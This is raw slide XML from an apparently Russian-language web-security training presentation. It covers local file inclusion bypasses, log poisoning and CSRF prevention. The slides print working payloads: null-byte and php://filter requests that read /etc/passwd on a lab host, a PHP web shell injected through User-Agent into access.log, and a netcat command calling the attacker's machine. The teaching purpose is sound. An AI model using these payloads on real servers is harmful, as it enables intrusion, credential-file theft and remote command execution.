                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>, а содержимое этого файла не будет отображаться на странице, так как файла не существует. Но такой фильтр можно обойти с помощью так называемого нулевого байта, который будет «отсекать» все, что будет идти после него. Дело в том, что вся адресная строка при передаче HTTP-запроса кодируется в URL-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>encode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>, и в этой кодировке нулевой байт выглядит как </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>%00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>. Таким образом, строчка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etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>/passwd%00.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> будет преобразована в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etc</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passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>. Однако стоит отметить, что данная проблема является довольно известной и исправлена в версии </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>PHP 5.3+</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="ru-RU" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Другой вариант обхода фильтрации — использование </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>filter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>. В параметре, отвечающем за включение файлов, пишем не просто путь до файла, который мы хотим включить, а путь до файла с использованием этой функции. Теперь запрос, который мы будем отправлять, имеет вид:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="ru-RU" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>http://site.test.lan/index2.php?file=php://filter/convert.base64-encode/resource=/etc/passwd</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="ru-RU" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="ru-RU" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="ru-RU" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>И теперь на странице браузера мы увидим не содержимое файла, а его исходник в кодировке </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>base64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>, который можно декодировать:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="ru-RU" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="ru-RU" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="ru-RU" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="ru-RU" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="ru-RU" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>С основными моментами уязвимости LFI разобрались, и теперь понимаем, что при ее эксплуатации можно прочитать локальный файл на удаленном сервере. Но у LFI есть интересная особенность, позволяющая не просто прочитать локальные файлы, а скомпрометировать сервер.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="ru-RU" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Отравление журнала веб-сервера</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="ru-RU" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Думаю, стоит сразу оговориться, что уязвимость не новая, но тем не менее она до сих встречается и может представлять серьезную угрозу для безопасности веб-сервера. При взаимодействии с веб-приложением любой наш запрос записывается в журналы веб-сервера, как правило, это файлы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var</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log</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nginx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>/access.log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> или </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var</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log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>nginx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>/error.log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> если, например, используется веб-сервер </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Nginx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>, но названия конечных файлов, разумеется, могут отличаться.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="ru-RU" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="ru-RU" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="ru-RU" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Теперь, составив специальный запрос, мы создадим веб-шелл на сервере, записав его в </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>access.log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>. Для отправки запроса будем использовать инструмент </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0097E6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>Burp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0097E6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t> Suite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>, позволяющий в режиме реального времени перехватывать и редактировать запросы.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="ru-RU" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="ru-RU" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="ru-RU" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Наш веб-шелл </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>($_GET[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>]); ?&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> записан в журнале веб-сервера и готов к использованию.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="ru-RU" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="ru-RU" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="ru-RU" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Почему использовался именно параметр </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>User-Agent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>? Как уже говорилось ранее, адресная строка кодирует информацию с помощью URL-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>encode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>, поэтому для передачи </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>-кода нужно использовать заголовки, а так как в </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>access.log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> точно пишется User-Agent, то и используем его. Обратившись к нашему веб-шеллу, получаем возможность выполнять различные команды через параметр </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="ru-RU" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>http://site.test.lan/index2.php?file=/var/log/nginx/access.log&amp;cmd=ls /</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="ru-RU" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="ru-RU" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="ru-RU" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>В чем отличие? LFI позволяет включать файл на сервере, но необходимо указать полный путь до этого файла, то есть знать, где этот файл находится. Во втором случае выполняется команда на самом сервере, а результат отображается в веб-приложении.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="ru-RU" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Убедившись, что мы можем выполнять различные команды на сервере, переходим к получению доступа на него. Для этого указываем в параметре </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> команду запуска </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> для связи с сервером атакующего, то есть с нами:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="ru-RU" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>http://site.test.lan/index2.php?file=/var/log/nginx/access.log&amp;cmd=nc 192.168.0.135 4455</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="ru-RU" dirty="0"/>
            </a:br>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23</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="164080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80EA2E60-5E3E-4AAB-B5EC-6CA89797E6E9}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="255549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Наш самый свежий отчёт по </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>WEB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>:   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://www.ptsecurity.com/ru-ru/research/analytics/web-vulnerabilities-2020-2021/</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>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3</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1223756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4</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="70845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Подделка межсайтовых запросов (CSRF/XSRF) - это атака, которая заставляет конечного пользователя выполнять нежелательные действия в веб-приложении, в котором он в настоящее время аутентифицирован. Атаки CSRF нацелены именно на запросы, изменяющие состояние, а не на кражу данных, поскольку у атакующего нет возможности увидеть ответ на поддельный запрос.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0"/>
              <a:t>Как предотвратить? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="73660" marR="36195" algn="just">
              <a:lnSpc>
                <a:spcPts val="1300"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="335"/>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ед</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вра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ь</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-5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CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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уникальн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ы</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>м</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токеном</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каждом</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-2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HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-5" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>-</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е</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r>
              <a:rPr lang="ru-RU" sz="1800" spc="-5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Такие</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токены должны</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быть</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-2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уни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к</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>альными</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как</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минимум</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-4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для</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каждой</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е</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
